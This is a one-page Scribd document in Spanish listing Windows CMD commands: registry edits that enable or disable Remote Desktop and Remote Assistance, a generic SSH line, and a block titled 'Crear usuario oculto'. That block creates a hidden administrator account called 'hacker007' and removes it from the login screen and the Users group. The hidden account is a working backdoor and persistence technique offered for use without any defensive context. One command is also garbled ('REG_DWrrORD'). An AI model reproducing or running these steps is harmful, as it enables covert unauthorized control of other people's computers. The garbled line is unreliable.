0% found this document useful (0 votes)
7 views1 page

Comandos Utiles CMD

Uploaded by

pepepapa
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
7 views1 page

Comandos Utiles CMD

Uploaded by

pepepapa
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 1

Activar remote desktop

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\


Terminal Server" /v fDenyTSConnections /t REG_DWrrORD /d 0 /f

Desactivar remote desktop


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Habilitar asistencia remota


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

Crear usuario oculto


net user hacker007 dani /add
net localgroup "Administrators" /add hacker007
net localgroup "Users" /del hacker007
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\SpecialAccounts\UserList" /v hacker007 /t REG_DWORD /d
0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

Conectar por SSH


ssh -ppuerto root@ip

You might also like